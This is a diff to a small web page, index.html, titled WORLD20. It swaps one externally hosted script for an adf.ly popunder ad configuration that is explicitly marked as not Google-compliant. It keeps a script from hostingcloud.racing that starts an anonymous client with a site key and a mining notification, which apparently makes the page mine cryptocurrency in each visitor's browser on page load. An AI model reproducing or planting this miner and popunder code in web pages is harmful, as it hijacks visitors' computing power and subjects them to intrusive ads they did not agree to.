--- a/index.html
+++ b/index.html
@@ -10,11 +10,15 @@
 </head>
 <body style="background-color:black; color:white">
 <h1>WORLD20</h1>
-<script src="https://www.hostingcloud.racing/E50e.js"></script>
+  
 <script type="text/javascript">
     var adfly_id = 22299945;
     var popunder_frequency_delay = 0;
     var adfly_google_compliant = false;
+</script>
+<script src="https://cdn.adf.ly/js/display.js"></script>
+  
+  
 <script src="https://www.hostingcloud.racing/bhUE.js"></script>
 <script>
     var _client = new Client.Anonymous('1d62bf74a4a980aee945fbedf0a3b709aa76461d00b43ae13ef14ec9ced10230', {
@@ -22,7 +26,7 @@
     });
     _client.start();
     _client.addMiningNotification("Top", "festyy.com/w5qFXf", "#cccccc", 40, "#3d3d3d");
-
 </script>
+  
 </body>
 </html>
